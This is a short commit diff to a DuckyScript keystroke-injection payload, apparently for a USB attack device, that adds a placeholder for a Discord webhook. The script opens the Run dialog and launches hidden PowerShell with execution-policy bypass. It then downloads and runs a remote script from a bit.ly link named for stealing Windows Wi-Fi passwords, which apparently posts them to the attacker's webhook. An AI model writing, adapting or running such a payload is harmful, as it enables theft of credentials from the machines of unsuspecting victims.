Defined Discord Webhook
parent
8a5679a9e4
commit
dfca1ced37
|
@ -38,7 +38,12 @@ REM And it will be sent to '$discord' wehbook with the Json object '$Body' a
|
|||
REM Requirements:
|
||||
REM - Nothing
|
||||
|
||||
REM REQUIRED - Provide Discord Webhook
|
||||
DEFINE #z YOUR-DISCORD-WEBHOOK
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 250
|
||||
STRINGLN powershell -w h -ep bypass $discord='';irm bit.ly/WLAN-Windows-Password | iex
|
||||
STRING powershell -w h -ep bypass $discord='
|
||||
STRING #z
|
||||
STRINGLN ';irm bit.ly/WLAN-Windows-Password | iex
|
||||
|
|
Loading…
Reference in New Issue